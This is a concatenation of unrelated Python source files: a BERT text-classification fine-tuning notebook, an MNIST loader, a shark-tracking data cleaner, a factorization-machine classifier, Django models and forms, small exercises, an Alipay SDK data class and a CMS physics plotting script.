    dataset_for_loader = []
    for text1, label, text2, tag in datasetList:
        # encode_plus inserts "[SEP]" between the two segments itself
        encoding = tokenizer.encode_plus(
            text1,
            text2 + "[SEP]" + tag,
            max_length=max_length,
            padding='max_length',
            truncation=True,
        )
        encoding['labels'] = label # add the label
        encoding = { k: torch.tensor(v) for k, v in encoding.items() }
        dataset_for_loader.append(encoding)
    return dataset_for_loader
# %%
dataset_train = dataset_for_loader(dataset_trainList)
dataset_val = dataset_for_loader(dataset_valList)
dataset_test = dataset_for_loader(dataset_testList)
# %% Fix the random seeds for reproducibility
seed = 42
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def seed_worker(worker_id):
    # Re-seed numpy/random inside each DataLoader worker process.
    worker_seed = torch.initial_seed() % 2**32
    np.random.seed(worker_seed)
    random.seed(worker_seed)
g = torch.Generator()
g.manual_seed(seed)
# %%
# Build DataLoaders from the datasets.
# NOTE(review): the original comment said the training loader should use
# shuffle=True, but shuffle is not actually passed -- confirm intent.
dataloader_train = DataLoader(
    dataset_train, batch_size=32, worker_init_fn=seed_worker, generator=g
)
dataloader_val = DataLoader(dataset_val, batch_size=256, worker_init_fn=seed_worker, generator=g)
dataloader_test = DataLoader(dataset_test, batch_size=256, worker_init_fn=seed_worker, generator=g)
# %%
# 6-14
class BertForSequenceClassification_pl(pl.LightningModule):
    """PyTorch Lightning wrapper around BertForSequenceClassification."""
    def __init__(self, model_name, num_labels, lr):
        # model_name: name of the Transformers model
        # num_labels: number of labels
        # lr: learning rate
        super().__init__()
        # Save num_labels and lr; accessible as e.g. self.hparams.lr and
        # stored automatically when checkpoints are written.
        self.save_hyperparameters()
        # Load BERT
        self.bert_sc = BertForSequenceClassification.from_pretrained(
            model_name,
            num_labels=num_labels
        )
    # Compute the loss for a training mini-batch (`batch`).
    # batch_idx is the mini-batch index (unused here).
    def training_step(self, batch, batch_idx):
        output = self.bert_sc(**batch)
        loss = output.loss
        self.log('train_loss', loss) # log the loss under 'train_loss'
        return loss
    # Compute the evaluation metric for a validation mini-batch.
    def validation_step(self, batch, batch_idx):
        output = self.bert_sc(**batch)
        val_loss = output.loss
        self.log('val_loss', val_loss) # log the loss under 'val_loss'
    # Compute the evaluation metric for a test mini-batch.
    def test_step(self, batch, batch_idx):
        labels = batch.pop('labels') # take the labels out of the batch
        output = self.bert_sc(**batch)
        labels_predicted = output.logits.argmax(-1)
        num_correct = ( labels_predicted == labels ).sum().item()
        accuracy = num_correct/labels.size(0) # accuracy
        self.log('accuracy', accuracy) # log it under 'accuracy'
    # Return the optimizer used for training.
    def configure_optimizers(self):
        return torch.optim.Adam(self.parameters(), lr=self.hparams.lr)
# %%
# 6-15
# Conditions for saving model weights during training
checkpoint = pl.callbacks.ModelCheckpoint(
    monitor='val_loss',
    mode='min',
    save_top_k=1,
    save_weights_only=True,
    dirpath='model/',
)
# Training configuration
trainer = pl.Trainer(
    gpus=1,
    max_epochs=10,
    callbacks = [checkpoint]
)
# %%
# 6-16
# Instantiate the PyTorch Lightning model
model = BertForSequenceClassification_pl(
    MODEL_NAME, num_labels=4, lr=1e-5
)
# %%
# Run the fine-tuning.
trainer.fit(model, dataloader_train, dataloader_val)
# %%
# 6-17
best_model_path = checkpoint.best_model_path # file of the best model
print('ベストモデルのファイル: ', checkpoint.best_model_path)
print('ベストモデルの検証データに対する損失: ', checkpoint.best_model_score)
# %%
# 6-18
get_ipython().run_line_magic('load_ext', 'tensorboard')
get_ipython().run_line_magic('tensorboard', '--logdir ./')
# %%
# 6-19
test = trainer.test(test_dataloaders=dataloader_test)
print(f'Accuracy: {test[0]["accuracy"]:.2f}')
# %%
model = BertForSequenceClassification_pl.load_from_checkpoint(best_model_path)
model = model.cuda()
# %%
model.bert_sc.save_pretrained('./model_transformers')
# %%
bert_sc = BertForSequenceClassification.from_pretrained(
    './model_transformers'
)
bert_sc = bert_sc.cuda()
# %%
# Unpack the test rows for evaluation.
text_list = []
label_list = []
for text, label, EntityTx, tag in dataset_testList:
    text_list.append(text)
    label_list.append(label)
# %%
pd.DataFrame(label_list, columns=['label']).groupby('label').size()
# %%
dataset_testList
# %%
# Helper that encodes rows and runs the classifier to obtain predicted labels
def encoding_plus_for_logits(dataset_List, num1, num2):
    """Encode rows [num1:num2) and return predicted label ids.

    dataset_List -- rows of [context, label, entity_text, tag]
    num1, num2   -- slice bounds; keep the slice small enough to fit GPU
                    memory (the whole slice is fed as a single batch)
    Uses the module-level `tokenizer` and `bert_sc` (on CUDA).
    """
    dataset_encoding_list = []
    max_length = 128
    for text1, label, text2, tag in dataset_List:
        encoding = tokenizer.encode_plus(
            text1,
            text2 + "[SEP]" + tag,
            max_length=max_length,
            padding='max_length',
            truncation=True,
        )
        encoding['labels'] = label # add the label
        encoding = { k: torch.tensor(v) for k, v in encoding.items() }
        dataset_encoding_list.append(encoding)
    # A list of dicts cannot be fed to bert_sc(**...) directly,
    # so reshape it below into one dict of stacked tensors.
    encoding_input_ids = []
    encoding_token_type = []
    encoding_attention_mask = []
    encoding_labels = []
    # pull the fields out of each dict
    for i in range(num1, num2):
        encoding_input_ids.append(dataset_encoding_list[i]['input_ids'])
        encoding_token_type.append((dataset_encoding_list[i]['token_type_ids']))
        encoding_attention_mask.append((dataset_encoding_list[i]['attention_mask']))
        encoding_labels.append((dataset_encoding_list[i]['labels']))
    # stack the tensors
    dataset_encoding = {'input_ids': torch.stack(encoding_input_ids).cuda(),
                        'token_type_ids':torch.stack(encoding_token_type).cuda(),
                        'attention_mask':torch.stack(encoding_attention_mask).cuda(),
                        'labels':torch.stack(encoding_labels).cuda()
                        }
    # get the predicted labels
    with torch.no_grad():
        output = bert_sc(**dataset_encoding)
        scores = output.logits
        labels_predicted = scores.argmax(-1)
    return labels_predicted
# %%
labels_predicted = encoding_plus_for_logits(dataset_testList, 0, len(dataset_testList))
# %%
labels_predicted = labels_predicted.tolist()
# %%
# %%
df_test = pd.DataFrame(dataset_testList, columns=['text', 'label', 'Entitytext', 'tag'])
# %%
# %%
# Attach the predictions
df_test['predicted']=labels_predicted
# %%
def DataFrame_classification(label, predicted):
    """Return sklearn's classification report as a rounded DataFrame.

    Rows are the classes plus the summary rows; the 'support' column is
    cast back to int (round(3) would otherwise leave it as float).
    """
    from sklearn.metrics import classification_report
    report = classification_report(
        label, predicted, digits=3, zero_division=0, output_dict=True)
    table = pd.DataFrame(report).round(3).T
    table['support'] = table['support'].astype(int)
    return table
# %%
# Final evaluation table: per-class precision/recall/F1 on the test split.
DataFrame_classification(df_test["label"], df_test["predicted"])
|
"""
checking if I can import mnist
"""
import matplotlib.pyplot as plt
import numpy as np
import os
def load_mnist(data_dir):
    """Load the raw IDX-format MNIST files found in *data_dir*.

    Skips the 16-byte image header / 8-byte label header and returns
    (X_train, y_train, X_test, y_test) with each image flattened to a
    784-element uint8 row.
    """
    def _images(name):
        # 16-byte IDX header, then one uint8 per pixel.
        raw = np.fromfile(os.path.join(data_dir, name), dtype=np.uint8, offset=16)
        return raw.reshape(-1, 28 * 28)

    def _labels(name):
        # 8-byte IDX header, then one uint8 per label.
        return np.fromfile(os.path.join(data_dir, name), dtype=np.uint8, offset=8)

    return (_images('mnist-train-images.dat'),
            _labels('mnist-train-labels.dat'),
            _images('mnist-test-images.dat'),
            _labels('mnist-test-labels.dat'))
# Load the arrays from the local 'mnist' directory at import time.
X_train, y_train, X_test, y_test = load_mnist('mnist')
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import io
import pandas as pd
from datetime import datetime
# In[2]:
# Upload the CSV Here
# from google.colab import files
# uploaded = files.upload()
# # Replace the filename here if you have saved the CSV as a different
# df = pd.read_csv(io.BytesIO(uploaded[
# 'Beneath The Waves - Blue Shark Atlantic - Data Jan 21, 2019.csv']))
df = pd.read_csv(
    'https://drive.google.com/uc?id=1XtdF630BEDDv-ixbZ6cE4RJlbVwukiUU&export=download'
)
# In[ ]:
# Now that we have uploaded the Data we can see it as a Dataframe
df.head()
# Next step is to clean the Data and drop the columns we don't need
# Maps raw CSV headers to snake_case column names; its keys also define
# which columns are kept after cleaning.
COLUMN_MAPPING = {
    'Prg No.': 'prg_no',
    'Latitude': 'lat',
    'Longitude': 'long',
    'Loc. quality': 'loc_quality',
    'Loc. date': 'loc_date',
    'Loc. type': 'loc_type',
    'Altitude': 'alt',
    'Pass': 'pass',
    'Sat.': 'satellite',
    'Frequency': 'freq',
    'Msg Date': 'msg_date',
    'Comp.': 'comp',
    'Msg': 'msg',
    '> - 120 DB': 'db_120_gt',
    'Best level': 'best_level',
    'Delta freq.': 'delta_freq',
    'Long. 1': 'long_1',
    'Lat. sol. 1': 'late_sol_1',
    'Long. 2': 'long_2',
    'Lat. sol. 2': 'lat_sol_2',
    'Loc. idx': 'loc_idx',
    'Nopc': 'nopc',
    'Error radius': 'err_radius',
    'Semi-major axis': 'semi_major_axis',
    'Semi-minor axis': 'semi_minor_axis',
    'Ellipse orientation': 'ellipse_orientation',
    'GDOP': 'gdop'
}
# Drop rows with no location data
cleaned_df = df.dropna(subset=['Latitude', 'Longitude'])
# Drop rows with bad location data quality (quality flag must be numeric)
cleaned_df = cleaned_df.loc[cleaned_df['Loc. quality'].apply(str.isdigit)]
# Select the important columns
cleaned_df = cleaned_df[list(COLUMN_MAPPING.keys())]
# Rename the columns to be more pythonic
cleaned_df = cleaned_df.rename(columns=COLUMN_MAPPING)
# Cast the location-date strings to datetime
cleaned_df['loc_date'] = cleaned_df.loc_date.apply(lambda x: datetime.strptime(x, '%m/%d/%y %H:%M'))
cleaned_df.head()
# In[ ]:
|
import load_data
import blocks
import features
import numpy as np
import scipy.sparse as sp
from sklearn.preprocessing import normalize
from sklearn.metrics import accuracy_score
from sklearn.cross_validation import train_test_split
from sklearn import cross_validation
import copy
from sklearn.externals.joblib import Memory
memory = Memory('data/cache/')
def evaluate(doc):
    """Run a train/test split evaluation for the experiment described by *doc*.

    Splits by session (not by row) 2:1, trains the FM model, post-processes
    block-level probabilities and stores the best threshold/accuracy in
    doc['output'].  Returns the mutated *doc*.
    """
    train_data = load_data.data_df(doc['dataset']['path'])
    n_session = train_data.session_id.nunique()
    session_ids = train_data.session_id.unique()
    train_data['row_nr'] = train_data.index
    train_data = train_data.set_index('session_id')
    # Deep-copy the parts of doc that define the design matrix so the
    # matrix construction sees a stable dict.
    design_doc = dict((d, copy.deepcopy(doc[d]))
                      for d in ['dataset', 'shift_features', 'max_shift',
                                'min_freq', 'features'])
    train_doc = {'fm_param': doc['fm_param'],
                 'seeds': doc['seeds']}
    y = train_data.gender.values.copy()
    y[y == 0] = -1  # FM expects labels in {-1, +1}
    X = create_design_matrix(design_doc)
    # Split on session indices so rows of one session never straddle
    # train and test.
    i_sessions = np.arange(n_session)
    X_train_org, X_test, i_train, i_test = train_test_split(
        i_sessions, i_sessions, test_size=0.33, random_state=23)
    i_train = train_data.loc[session_ids[i_train]].row_nr.values
    i_test = train_data.loc[session_ids[i_test]].row_nr.values
    y_train_org = y[i_train]
    y_test = y[i_test]
    X_train_org = X[i_train, :]
    X_test = X[i_test, :]
    t_best = 0.0
    acc_best = 0.0
    y_pred_proba = fit_predict(X_train_org, y_train_org, X_test, train_doc)
    # Smooth probabilities over blocks of consecutive records.
    df_block = blocks.get_blocks(doc)
    df_block = df_block.set_index('session_id').\
        loc[session_ids[i_test]].reset_index('session_id')
    df_block['proba'] = y_pred_proba
    df_post = blocks.postprocess(df_block, doc['min_size'],
                                 doc['lower_proba'], doc['upper_proba'])
    y_pred_proba = df_post.proba.values
    t_best, acc_best = find_treashold(y_test, y_pred_proba)
    doc['output']['threshold'] = t_best
    doc['output']['acc'] = acc_best
    return doc
def find_treashold(y_test, y_pred_proba,
                   levels=[.5, .65, .7, .75, .7802, .8, .82, .83, .84, .85,
                           .86, .87, .88, .9], verbose=True):
    """Grid-search the decision threshold maximizing balanced accuracy.

    Returns (best_threshold, best_accuracy).
    NOTE(review): the name keeps the historic typo ('treashold') because
    callers in this module use it; the mutable default `levels` list is
    never modified here.
    """
    acc_best = 0
    t_best = 0
    for t in levels:
        acc = balanced_acc(y_test, y_pred_proba, t)
        if verbose:
            print t, acc
        if acc > acc_best:
            t_best = t
            acc_best = acc
    return t_best, acc_best
def submission(doc):
    """Train on the full training set and write the submission files.

    Writes predicted gender labels ('male'/'female') to
    doc['submission_path'] and the raw probabilities next to it with a
    'probs' suffix.
    """
    train_data = load_data.data_df(doc['dataset']['path'])
    y_train = train_data.gender.values.copy()
    y_train[y_train == 0] = -1  # FM expects labels in {-1, +1}
    X_train = create_design_matrix(doc, is_test=False)
    X_test = create_design_matrix(doc, is_test=True)
    y_pred_proba = fit_predict(X_train, y_train, X_test, doc)
    df_block = blocks.get_blocks(doc, is_test=True)
    df_block['proba'] = y_pred_proba
    df_post = blocks.postprocess(df_block, doc['min_size'],
                                 doc['lower_proba'], doc['upper_proba'])
    y_pred_proba = df_post.proba.values
    # Everything at or below the tuned threshold is classified male.
    y_output = np.array(['female'] * len(y_pred_proba))
    y_output[y_pred_proba <= doc['threshold']] = 'male'
    np.savetxt(doc['submission_path'], y_output, fmt="%s", newline='\n')
    np.savetxt(doc['submission_path'] + 'probs',
               y_pred_proba, fmt="%s", newline='\n')
def create_design_matrix(doc, is_test=False):
    """Assemble the sparse feature matrix selected by doc['features'].

    Builds categorical matrices (optionally re-binned at the frequency
    cut-offs in doc['min_freq']), adds shifted neighbor features,
    l2-normalizes every sparse part and hstacks the selected feature
    groups into a single CSC matrix.
    """
    path = doc['dataset']['path']
    X_cat = features.cat_matrices(path, is_test=is_test)
    if 'min_freq' in doc:
        for min_freq in doc['min_freq']:
            X_cat_min_feq = features.cat_matrices(path, is_test=is_test,
                                                  min_freq=min_freq)
            X_cat.update(X_cat_min_feq)
    X_shift = features.neighbors(X_cat, doc, is_test)
    X_cat.update(X_shift)
    # Normalize the sparse parts only; dense parts are used as-is.
    X_features = [normalize(X_cat[cat], norm='l2').tocsc() if
                  sp.isspmatrix(X_cat[cat])
                  else X_cat[cat] for cat in doc['features'] if
                  cat in X_cat]
    X = sp.hstack(X_features).tocsc()
    return X
#@memory.cache
def fit_predict(X_train, y_train, X_test, doc):
    # Thin indirection kept so the joblib memory.cache decorator above
    # can be re-enabled without touching callers.
    return fit_predict_fm(X_train, y_train, X_test, doc)
def fit_predict_fm(X_train, y_train, X_test, doc):
    """Fit MCMC factorization machines and return mean predicted probabilities.

    Trains one model per seed in doc['seeds'] and averages the predicted
    probabilities across seeds.
    """
    print 'fm'
    n_seeds = len(doc['seeds'])
    y_pred_proba = np.empty((X_test.shape[0], n_seeds), dtype=np.float64)
    # fit FM with multiple seeds to reduce dependency on individual seeds
    for n, s in enumerate(doc['seeds']):
        from fastFM import mcmc
        param = doc['fm_param']
        fm = mcmc.FMClassification(random_state=s, rank=param['rank'],
                                   init_stdev=param['stdev'],
                                   n_iter=param['n_iter'])
        y_pred_proba[:, n] = fm.fit_predict_proba(X_train, y_train, X_test)
    return y_pred_proba.mean(axis=1)
def balanced_acc(y_test, y_pred_proba, threshold=0.5):
    """Accuracy with the +1 class re-weighted by the class ratio so both
    classes contribute equally regardless of imbalance.

    Probabilities at or above *threshold* predict +1, below it -1.
    """
    predictions = np.ones_like(y_pred_proba)
    predictions[y_pred_proba < threshold] = -1
    n_male = (y_test == -1).sum()
    n_female = len(y_test) - n_male
    ratio = float(n_male) / n_female
    weights = np.ones_like(y_test)
    weights[y_test == 1] *= ratio
    return accuracy_score(y_test, predictions, sample_weight=weights)
def transform(X_train, y_train, X_test, doc):
    """Create rolling-window probability features from FM predictions.

    Returns (X_train_proba, X_test_proba); X_test_proba is None when no
    test matrix is given.  Training-set predictions come from stratified
    K-fold cross-validation so every training row gets an out-of-fold
    prediction.
    """
    print 'transform'
    if X_test is not None:
        y_test_pred = fit_predict_fm(X_train, y_train, X_test, doc)
        X_test_proba =\
            features.padded_rolling_window(y_test_pred,
                                           doc['transform']['window'])
    else:
        X_test_proba = None
    # cross-validation is needed to get predictions for all training samples
    y_train_pred = np.empty_like(y_train, dtype=np.float64)
    y_train_pred.fill(np.nan)
    kf = cross_validation.StratifiedKFold(y_train,
                                          n_folds=doc['transform']['n_folds'],
                                          shuffle=True, random_state=123)
    for i_train, i_test in kf:
        print i_train.shape, i_test.shape
        tmp_pred = fit_predict_fm(X_train[i_train, :],
                                  y_train[i_train], X_train[i_test, :], doc)
        y_train_pred[i_test] = tmp_pred
    X_train_proba = features.padded_rolling_window(y_train_pred,
                                                   doc['transform']['window'])
    return X_train_proba, X_test_proba
|
class Backtrack:
    """Skeleton for Skiena-style recursive backtracking.

    Subclasses supply isSolution, processSolution and constructCandidates;
    makeMove/unmakeMove are optional hooks around each recursive step.
    Candidate k is stored at index k of the partial-solution vector `a`
    (index 0 is unused).
    """

    def backtrack(self, a, k, userData):
        """Extend partial solution a[1..k]; report every complete solution."""
        if self.isSolution(a, k, userData):
            self.processSolution(a, k, userData)
            return
        k += 1
        for candidate in self.constructCandidates(a, k, userData):
            a[k] = candidate
            self.makeMove(a, k, userData)
            self.backtrack(a, k, userData)
            self.unmakeMove(a, k, userData)

    def makeMove(self, a, k, userData):
        """Hook called after placing candidate k; default: do nothing."""
        return

    def unmakeMove(self, a, k, userData):
        """Hook called after exploring candidate k; default: do nothing."""
        return
|
from django import forms
class NewUserForm(forms.Form):
    """Minimal signup form: a display name and an email address."""
    name = forms.CharField(label='name', max_length=100)  # free-text display name
    email = forms.EmailField(label='email')  # validated as an email address
|
# task 1: convert centimetres to inches (reject negative lengths)
nyaam = float(input('enter a length in cm: '))
if nyaam < 0:
    print('entry is invalid')
else:
    res = nyaam / 2.54
    print(res, 'inch')

# task 2: classify a student by number of completed credits
whoosh = int(input('how many credits have you taken? '))
if 0 < whoosh < 24:
    print('congrats, you a freshman!')
elif 23 < whoosh < 54:
    print('congrats, you a sophomore!')
elif 53 < whoosh < 84:
    print('congrats, you a junior!')
elif whoosh > 83:
    print('congrats, you a senior!')
else:
    # whoosh is an int, so reaching here means whoosh <= 0
    print('you haven\'t any credits, fool')

# task 3: guess the randomly drawn number
from random import randrange
jeffry = randrange(10)
goat = float(input('guess the number between 0 n 10: '))
if goat == jeffry:
    print('you\'re right!')
else:
    print('that\'s not it, pal')
print(jeffry)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class LogicalRuleItemDTO(object):
    """Value object for a logical crowd-rule item (Alipay open API).

    to_alipay_dict/from_alipay_dict convert to and from plain dicts,
    skipping unset (falsy) fields like the rest of the SDK models.
    """

    # Field names shared by the two dict conversions below.
    _FIELDS = ('crowd_name', 'ext_crowd_key', 'gmt_expired_time',
               'schedule_type', 'type')

    def __init__(self):
        self._crowd_name = None
        self._ext_crowd_key = None
        self._gmt_expired_time = None
        self._schedule_type = None
        self._type = None

    @property
    def crowd_name(self):
        return self._crowd_name

    @crowd_name.setter
    def crowd_name(self, value):
        self._crowd_name = value

    @property
    def ext_crowd_key(self):
        return self._ext_crowd_key

    @ext_crowd_key.setter
    def ext_crowd_key(self, value):
        self._ext_crowd_key = value

    @property
    def gmt_expired_time(self):
        return self._gmt_expired_time

    @gmt_expired_time.setter
    def gmt_expired_time(self, value):
        self._gmt_expired_time = value

    @property
    def schedule_type(self):
        return self._schedule_type

    @schedule_type.setter
    def schedule_type(self, value):
        self._schedule_type = value

    @property
    def type(self):
        return self._type

    @type.setter
    def type(self, value):
        self._type = value

    def to_alipay_dict(self):
        """Serialize the set (truthy) fields to a plain dict."""
        params = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value:
                # Nested SDK objects serialize themselves.
                if hasattr(value, 'to_alipay_dict'):
                    value = value.to_alipay_dict()
                params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build a LogicalRuleItemDTO from a dict; None for empty input."""
        if not d:
            return None
        o = LogicalRuleItemDTO()
        for field in LogicalRuleItemDTO._FIELDS:
            if field in d:
                setattr(o, field, d[field])
        return o
|
from django.contrib import admin
from blogs.models import Blog
from blogs.models import Post
from blogs.models import Comment
from blogs.models import Subscription
# Register the blog models with the default admin interface.
# Fix: the last line carried a stray '|' extraction artifact that made it
# a syntax error; removed.
admin.site.register(Blog)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Subscription)
from django.db import models
from users.models import MainUser
from core.constants import TASK_STATUSES, TASK_TODO, TASK_DONE
class Project(models.Model):
    """
    Project model: a named project owned by a MainUser.
    """
    name = models.CharField(max_length=300)
    desc = models.TextField()
    # Deleting the creator cascades and removes their projects.
    creator = models.ForeignKey(MainUser, on_delete=models.CASCADE, related_name='projects')
    class Meta:
        verbose_name = 'Project'
        verbose_name_plural = 'Projects'
    def __str__(self):
        return self.name
    @property
    def tasks_count(self):
        # Number of related Task rows (via Task.project related_name='tasks').
        return self.tasks.count()
class TaskDoneManager(models.Manager):
    """Manager whose base queryset contains only DONE tasks."""
    def get_queryset(self):
        return super().get_queryset().filter(status=TASK_DONE)
    def done_tasks(self):
        # Redundant on this manager: the base queryset is already DONE-only.
        return self.filter(status=TASK_DONE)
    def filter_by_status(self, status):
        # NOTE(review): filters within the DONE-only queryset, so any
        # status other than TASK_DONE yields an empty queryset -- confirm.
        return self.filter(status=status)
class TaskTodoManager(models.Manager):
    """Manager whose base queryset contains only TODO tasks."""
    def get_queryset(self):
        return super().get_queryset().filter(status=TASK_TODO)
    def done_tasks(self):
        # NOTE(review): always empty -- filters DONE within the TODO-only
        # base queryset; looks like a copy-paste from TaskDoneManager.
        return self.filter(status=TASK_DONE)
    def filter_by_status(self, status):
        return self.filter(status=status)
class Task(models.Model):
    """A single task, optionally attached to a Project."""
    name = models.CharField(max_length=300, null=True, blank=True)
    # Status as a small integer drawn from core.constants.TASK_STATUSES.
    status = models.PositiveSmallIntegerField(choices=TASK_STATUSES, default=TASK_TODO)
    # Keep tasks when their project is deleted (project becomes NULL).
    project = models.ForeignKey(Project, on_delete=models.SET_NULL, related_name='tasks', null=True)
    is_deleted = models.BooleanField(default=False)  # soft-delete flag
    objects = models.Manager()      # unfiltered
    done_tasks = TaskDoneManager()  # only DONE tasks
    todo_tasks = TaskTodoManager()  # only TODO tasks
    class Meta:
        unique_together = ('project', 'name')
        ordering = ('name', 'status',)
        verbose_name = 'Task'
        verbose_name_plural = 'Tasks'
        db_table = 'my_tasks'
    def __str__(self):
        # NOTE(review): name is nullable; str() raises if name is None -- confirm.
        return self.name
    def __repr__(self):
        # Bug fix: previously `pass`, which made __repr__ return None and
        # repr(task) raise TypeError. Return a conventional representation.
        return 'Task(pk={}, name={!r}, status={})'.format(self.pk, self.name, self.status)
# Example manager usage (kept from development):
# t = Task.objects.done_tasks()
# t = Task.objects.filter_by_status(TASK_DONE)
# NOTE(review): module-level querysets; lazy, but evaluated once iterated --
# confirm these are still needed.
t1 = Task.done_tasks.all()
t2 = Task.todo_tasks.all()
# p = Project.objects.first()
# tasks = p.tasks.all()
# tasks = Task.objects.filter(project_id=p.id)
# class UserGroup(models.Model):
#     user = models.ForeignKey(User)
#     group = models.ForeignKey(Group)
# class Person(object):
#     def __init__(self):
#         self.name = ''
#         self.age = 18
#
#     def __str__(self):
#         pass
#
#     def hi(self):
#         return 'hello'
class BaseTask(models.Model):
    """Abstract base for task-like models: name + description plus helpers."""
    name = models.CharField(max_length=300)
    desc = models.TextField()
    def get_short_name(self):
        # First three characters of the name.
        return self.name[:3]
    @property
    def short_name(self):
        # Property twin of get_short_name().
        return self.name[:3]
    def set_name(self, name):
        # Renames and persists immediately.
        self.name = name
        self.save()
    def show_info(self):
        # Abstract hook: concrete subclasses must override.
        raise NotImplementedError(
            'must be implemented'
        )
    class Meta:
        ordering = ('-name',)
        abstract = True
class DeveloperTask(BaseTask):
    """Concrete BaseTask with a narrower name field plus helper methods."""
    name = models.CharField(max_length=200)
    class Meta(BaseTask.Meta):
        # Bug fix: the previous value nested the parent tuple inside a new
        # tuple -- (('-name',), 'desc') -- which is not a valid Django
        # ordering (elements must be field names/expressions). Concatenate
        # the parent ordering instead.
        ordering = BaseTask.Meta.ordering + ('desc',)
        unique_together = ('name', 'desc')
    @classmethod
    def fun(cls):
        # All rows of the concrete subclass.
        return cls.objects.all()
    @staticmethod
    def fun2(a, b):
        # Plain helper; no model access.
        return a + b
    def fun3(self):
        return DeveloperTask.objects.filter()
    @classmethod
    def fun4(cls, name):
        # Rows whose name contains the given substring.
        return cls.objects.filter(name__contains=name)
    def show_info(self):
        return ''
class StaffTask(BaseTask):
    """Concrete BaseTask variant carrying an extra message field."""
    message = models.CharField(max_length=100)
    def show_info(self):
        # Required override of BaseTask.show_info; nothing to show yet.
        return ''
# Usage examples kept from development:
# d = DeveloperTask()
# s = StaffTask()
# d.fun4('asd', s)
# DeveloperTask.fun4()
# DeveloperTask.fun()
# d.set_name('ASd')
# res = d.fun2(2, 3)
# Static methods can be called on the class without an instance.
res = DeveloperTask.fun2(2, 3)
|
#!/usr/bin/env python
from ROOT import *
import CMS_lumi
CMS_lumi.lumi_13TeV = "42 fb^{-1}"
#CMS_lumi.writeExtraText = 1
#CMS_lumi.writeExtraText2 = 1
CMS_lumi.extraText = "Preliminary"
import sys
import math
import array
gROOT.ProcessLine(".L ~/tdrStyle.C");
setTDRStyle()
gStyle.SetOptStat(0)
gROOT.SetBatch(True)
# Command-line arguments: the three ROOT input files and the plot selection.
mc=sys.argv[1]
data=sys.argv[2]
data_inverted=sys.argv[3]
var=sys.argv[4]
ptbin=sys.argv[5]
selection=sys.argv[6]
normalize=sys.argv[7]
mcfile = TFile(mc)
datafile = TFile(data)
datafile_inverted = TFile(data_inverted)
print var+"__"+ptbin+"_l"+selection
# systematics.py is expected to define weightSystematics and shapeSystematics.
handle = open("systematics.py",'r')
exec(handle)
handle.close()
allSystematics = []
allSystematics.extend(weightSystematics)
allSystematics.extend(shapeSystematics)
# Flavour-split MC templates: light (blue), charm (green), bottom (red).
hl = mcfile.Get(var+"__"+ptbin+"_l"+selection)
hl.SetFillColor(4)
hl.SetLineColor(4)
hc = mcfile.Get(var+"__"+ptbin+"_c"+selection)
hc.SetFillColor(3)
hc.SetLineColor(3)
hb = mcfile.Get(var+"__"+ptbin+"_b"+selection)
hb.SetFillColor(2)
hb.SetLineColor(2)
htotalmc = hl.Clone()
htotalmc.Add(hc)
htotalmc.Add(hb)
# Per-bin sums of squared up/down deviations over all systematics.
systSquareUp=[]
systSquareDo=[]
for ibin in range(1, htotalmc.GetNbinsX()+1):
    systSquareUp.append(0.)
    systSquareDo.append(0.)
for syst in allSystematics:
    print syst
    htotalUp = mcfile.Get(hl.GetName()+"_"+syst+"_up")
    htotalDo = mcfile.Get(hl.GetName()+"_"+syst+"_do")
    hcUp = mcfile.Get(hc.GetName()+"_"+syst+"_up")
    hcDo = mcfile.Get(hc.GetName()+"_"+syst+"_do")
    hbUp = mcfile.Get(hb.GetName()+"_"+syst+"_up")
    hbDo = mcfile.Get(hb.GetName()+"_"+syst+"_do")
    htotalUp.Add(hcUp)
    htotalUp.Add(hbUp)
    htotalDo.Add(hcDo)
    htotalDo.Add(hbDo)
    # Deviations above nominal go into the "up" sum, at-or-below into the
    # "down" sum, regardless of which variation produced them.
    for ibin in range(1, htotalmc.GetNbinsX()+1):
        if htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) > 0:
            systSquareUp[ibin-1] += (htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
        if htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) <= 0:
            systSquareDo[ibin-1] += (htotalUp.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
        if htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) > 0:
            systSquareUp[ibin-1] += (htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
        if htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin) <= 0:
            systSquareDo[ibin-1] += (htotalDo.GetBinContent(ibin) - htotalmc.GetBinContent(ibin))**2
# Build the MC uncertainty band (absolute) and the ratio band (relative).
x = array.array('f')
y = array.array('f')
yr= array.array('f')
xl = array.array('f')
xh = array.array('f')
yl = array.array('f')
yh = array.array('f')
ylratio = array.array('f')
yhratio = array.array('f')
for ibin in range(1, htotalmc.GetNbinsX()+1):
    x.append(htotalmc.GetBinCenter(ibin))
    xl.append(htotalmc.GetBinWidth (ibin) / 2.)
    xh.append(htotalmc.GetBinWidth (ibin) / 2.)
    yr.append(1.)
    if normalize != None:
        y.append(htotalmc.GetBinContent (ibin)/htotalmc.Integral())
        yl.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.Integral())
        yh.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.Integral())
        ylratio.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin)> 0 else 0.)
        yhratio.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin)> 0 else 0.)
    else:
        y.append(htotalmc.GetBinContent (ibin))
        yl.append(math.sqrt(systSquareDo[ibin-1]))
        yh.append(math.sqrt(systSquareUp[ibin-1]))
        ylratio.append(math.sqrt(systSquareDo[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin) > 0 else 0.)
        yhratio.append(math.sqrt(systSquareUp[ibin-1])/htotalmc.GetBinContent (ibin) if htotalmc.GetBinContent (ibin) > 0 else 0.)
tgrMC = TGraphAsymmErrors()
tgrMCRatio = TGraphAsymmErrors()
